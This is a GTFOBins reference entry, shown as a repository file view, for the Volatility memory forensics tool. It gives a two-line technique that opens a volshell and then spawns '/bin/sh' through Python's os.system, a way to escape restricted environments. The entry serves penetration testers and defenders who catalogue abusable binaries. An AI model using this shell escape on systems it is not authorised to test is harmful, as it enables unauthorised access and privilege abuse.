GTFOBins.github.io/_gtfobins/volatility.md

9 lines
338 B
Markdown
Raw Normal View History

---
description: This command requires some valid coredump file which, if not available, can be uploaded to the target. The `volshell` command spawns a [`python`](/gtfobins/python/) shell, other functions may apply.
functions:
shell:
- code: |
volatility -f file.dump volshell
__import__('os').system('/bin/sh')
---